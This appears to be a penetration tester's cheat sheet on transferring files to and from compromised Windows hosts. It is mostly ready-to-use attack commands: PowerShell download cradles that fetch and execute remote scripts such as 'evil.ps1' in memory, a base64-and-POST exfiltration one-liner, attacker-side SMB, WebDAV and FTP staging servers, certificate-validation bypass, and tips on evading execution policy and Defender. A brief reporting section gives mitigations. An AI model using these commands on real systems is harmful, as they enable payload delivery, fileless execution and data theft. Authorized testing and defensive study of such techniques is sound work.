🛡️ Methodology Checklist
- PowerShell IWR:
IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/[FILE]') - PowerShell save to disk:
Invoke-WebRequest -Uri http://[LHOST]/[FILE] -OutFile C:\[FILE] - PowerShell upload:
IWR -Uri http://[LHOST]:8000/upload -Method POST -InFile [FILE] - Bypass download restriction:
$env:APPDATAor$env:TEMPas drop path - Verify execution policy:
Get-ExecutionPolicy; bypass if needed - Check if Defender real-time protection blocks download
🎯 Operational Context
Use when: Moving files to/from Windows target — match method to available capabilities: PowerShell, SMB, certutil, BITS, WebDAV.
Think Dumber First: PowerShell Invoke-WebRequest or (New-Object Net.WebClient).DownloadFile() — available on all Windows 7+ systems. If outbound blocked, SMB pull: host impacket-smbserver on attack box, access via \\[LHOST]\share\file.
Skip when: PowerShell execution policy blocks and no LOL alternatives available — use interactive RDP clipboard paste.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
(New-Object Net.WebClient).DownloadFile('http://[TARGET_IP]/file', 'C:\Users\Public\file') | Download file to disk via WebClient |
(New-Object Net.WebClient).DownloadFileAsync('http://[TARGET_IP]/file', 'C:\Users\Public\file') | Non-blocking async download |
IEX (New-Object Net.WebClient).DownloadString('http://[TARGET_IP]/script.ps1') | Fileless download — execute in memory |
Invoke-WebRequest http://[TARGET_IP]/file -OutFile file | Download using IWR (aliases: iwr, curl, wget) |
Invoke-WebRequest http://[TARGET_IP]/file -UseBasicParsing | IEX | Bypass IE first-launch error |
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | Disable SSL cert validation |
cat [FILENAME] | base64 -w 0; echo | Encode file to Base64 (Linux attacker) |
[IO.File]::WriteAllBytes("C:\Users\Public\[FILENAME]", [Convert]::FromBase64String("[BASE64]")) | Decode Base64 to file (Windows target) |
Get-FileHash C:\Users\Public\[FILENAME] -Algorithm md5 | Verify integrity after transfer |
sudo impacket-smbserver share -smb2support /tmp/smbshare | Anonymous SMB share on attacker |
sudo impacket-smbserver share -smb2support /tmp -user [USER] -password [PASS] | Authenticated SMB share |
copy \\[TARGET_IP]\share\nc.exe | Download from SMB share (anonymous) |
net use n: \\[TARGET_IP]\share /user:[USER] [PASS] | Mount authenticated SMB share |
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous | Start WebDAV server (attacker) |
copy [FILE] \\[TARGET_IP]\DavWWWRoot\ | Upload to WebDAV share |
sudo python3 -m pyftpdlib --port 21 | Start FTP server on attacker |
(New-Object Net.WebClient).DownloadFile('ftp://[TARGET_IP]/file', 'C:\Users\Public\file') | Download from FTP via PowerShell |
python3 -m uploadserver | Start HTTP upload server (attacker) |
Invoke-FileUpload -Uri http://[TARGET_IP]:8000/upload -File C:\path\to\file | Upload file to Python upload server |
$b64=[System.convert]::ToBase64String((Get-Content -Path '[FILE]' -Encoding Byte)); Invoke-WebRequest -Uri http://[TARGET_IP]:8000/ -Method POST -Body $b64 | Base64 encode + POST to nc listener |
🔬 Deep Dive & Workflow
WebClient Method Comparison
| Method | Disk? | Use Case |
|---|---|---|
DownloadFile | Yes | Drop tools to filesystem |
DownloadString + IEX | No (RAM) | Fileless script execution |
DownloadData | No | Load binaries into memory vars |
DownloadFileAsync | Yes | Non-blocking; keeps shell responsive |
Advanced Download Cradles (When WebClient is Blocked)
# IE COM — uses browser engine, bypasses simple filters
$ie=New-Object -comobject InternetExplorer.Application
$ie.visible=$False; $ie.navigate('http://[TARGET_IP]/evil.ps1')
start-sleep -s 5; $r=$ie.Document.body.innerHTML; $ie.quit(); IEX $r
# Msxml2 COM — classic dropper method
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://[TARGET_IP]/evil.ps1',$false); $h.send(); iex $h.responseText
# WinHttp COM — lightweight, not proxy-aware
$h=new-object -com WinHttp.WinHttpRequest.5.1
$h.open('GET','http://[TARGET_IP]/evil.ps1',$false); $h.send(); iex $h.responseText
# BITS — trusted Windows service, touches disk
Import-Module bitstransfer; Start-BitsTransfer 'http://[TARGET_IP]/evil.ps1' $env:temp\t
$r=gc $env:temp\t; rm $env:temp\t; iex $rProtocol Priority Decision Tree
- HTTP available? →
python3 -m http.server+Invoke-WebRequest— fastest setup - SMB (445) open? →
impacket-smbserver+copy/net use— good for large files - HTTP blocked, SMB blocked? → WebDAV on port 80 (
wsgidav) — bypasses SMB filtering - All blocked? → Use coding language cradles or
/dev/tcpbash redirection
FTP Non-Interactive (CMD Scriptable)
echo open [TARGET_IP] > ftp.txt
echo USER anonymous >> ftp.txt
echo binary >> ftp.txt
echo GET file.txt >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txtWebDAV Note
DavWWWRoot is a special keyword that connects to the WebDAV root — not an actual folder on the server.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| PowerShell Invoke-WebRequest fails | TLS 1.2 not default on old Windows | Add: [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 |
| SMB share access denied | SMB signing or credential required | Use: impacket-smbserver share . -smb2support -username [USER] -password [PASS] |
| WebClient service not running | WebDAV disabled | Start: net start webclient then access via \\[LHOST]@80\share\ |
| BITS transfer stays queued | BITS service needs restart | net stop bits && net start bits; verify BITS service not disabled |
| DownloadFile returns no file | Silent failure on error | Check: (New-Object Net.WebClient).DownloadString('http://[LHOST]/test.txt') to see error message |
📝 Reporting Trigger
Finding Title: Unrestricted File Transfer Capability on Windows Target Impact: PowerShell and LOL binary transfer methods enable reliable payload delivery and data staging on Windows systems, supporting post-exploitation tool deployment and exfiltration operations. Root Cause: PowerShell and built-in Windows transfer capabilities are unrestricted. No egress filtering on workstation or server outbound HTTP/SMB traffic. Recommendation: Implement outbound proxy with URL filtering. Disable PowerShell v2. Restrict LOL binary network access via WDAC. Monitor for unusual PowerShell download cradle patterns.